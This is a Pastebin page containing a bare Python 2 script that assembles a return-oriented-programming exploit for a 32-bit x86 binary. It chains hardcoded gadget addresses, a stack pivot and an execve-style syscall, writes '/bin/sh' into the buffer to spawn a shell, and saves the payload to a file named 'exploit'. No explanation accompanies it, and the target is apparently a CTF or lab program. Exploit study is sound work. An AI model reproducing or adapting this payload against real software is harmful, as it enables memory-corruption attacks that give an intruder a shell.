Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import struct
- addr_popesp = 0x080bbf66;
- addr_pivot = 0xbfffec80 + 0x30 + 0x20;
- addr_xoreaxeax = 0x0807d70f;
- addr_addeax = 0x0808ee92;
- addr_popebx = 0x080481c9;
- addr_str = 0xbfffece4 + 0x30 + 0x20;
- addr_popedx = 0x0806fd6a;
- addr_nulls = 0xbfffeceb + 0x30 + 0x20;
- addr_popecx = 0x080e5885;
- addr_straddr = 0xbfffecf0 +0x30 + 0x20;
- addr_syscall = 0x08070430;
- addr_original = 0x8048f2b;
- popesp = struct.pack("<I",addr_popesp)
- pivot = struct.pack("<I",addr_pivot)
- xoreaxeax = struct.pack("<I",addr_xoreaxeax)
- addeax = struct.pack("<I",addr_addeax)
- popebx = struct.pack("<I",addr_popebx)
- test = struct.pack("<I",0xDEADC0DE)
- str = struct.pack("<I",addr_str)
- popedx = struct.pack("<I",addr_popedx)
- nulls = struct.pack("<I",addr_nulls)
- popecx = struct.pack("<I",addr_popecx)
- straddr = struct.pack("<I",addr_straddr)
- syscall = struct.pack("<I",addr_syscall)
- original = struct.pack("<I",addr_original)
- payload = xoreaxeax
- payload += addeax
- payload += "B" * 4
- payload += popebx
- payload += str
- payload += popedx
- payload += nulls
- payload += popecx
- payload += straddr
- payload += syscall
- payload += original
- payload += test
- payload += "A" * 972
- payload += popesp
- payload += pivot
- #payload = "A" * 1020
- #payload += "B" * 4
- #payload = xoreaxeax
- #payload += addeax
- #payload += "B" * 4
- #payload += original
- #payload += "A" * 1004
- #payload += popesp
- #payload += pivot
- paylist = list(payload)
- shell = "/bin/sh"
- i = 100;
- for c in shell:
- paylist[i] = c
- i = i + 1
- paylist[i] = '\0'
- paylist[i+1] = '\0'
- paylist[i+2] = '\0'
- paylist[i+3] = '\0'
- i = i+5
- for c in str:
- paylist[i] = c
- i = i + 1
- paylist[i] = '\0'
- paylist[i+1] = '\0'
- paylist[i+2] = '\0'
- paylist[i+3] = '\0'
- payload = "".join(paylist)
- file = open("exploit","w")
- file.write(payload)
- file.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement